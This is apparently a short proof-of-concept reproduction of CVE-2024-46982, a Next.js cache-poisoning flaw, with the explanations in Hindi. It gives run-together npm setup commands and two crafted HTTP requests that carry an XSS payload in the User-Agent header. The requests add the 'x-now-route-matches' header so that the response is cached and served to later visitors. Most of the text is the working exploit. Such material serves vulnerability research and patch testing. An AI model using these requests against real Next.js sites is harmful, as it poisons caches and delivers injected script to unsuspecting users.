
Reproduction of CVE-2024-46982
npm installnpm run buildnpm run startGET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1
2. किसी भी वेब ब्राउज़र का उपयोग करके http://localhost:3000 (सामान्य अनुरोध) पर जाएँ।


GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1
2. किसी भी वेब ब्राउज़र का उपयोग करके http://localhost:3000 (सामान्य अनुरोध) पर जाएँ।

x-now-route-matches Next.js द्वारा मान्यता प्राप्त एक कस्टम HTTP हैडर है। जब यह मौजूद होता है, तो Next.js HTTP अनुरोध को "SSG" (Static Site Generation) के रूप में मानेगा, जिससे HTTP प्रतिक्रिया कैश की जा सकती है (Cache-Control: s-maxage=1, stale-while-revalidate)।
?__nextDataReq=1 Next.js द्वारा मान्यता प्राप्त एक क्वेरीस्ट्रिंग है। जब यह मौजूद होता है, तो Next.js HTTP अनुरोध को "Retrieving __NEXT_DATA__" के रूप में मानेगा।
पूरा विवरण श्रेय अनुभाग में पाया जा सकता है।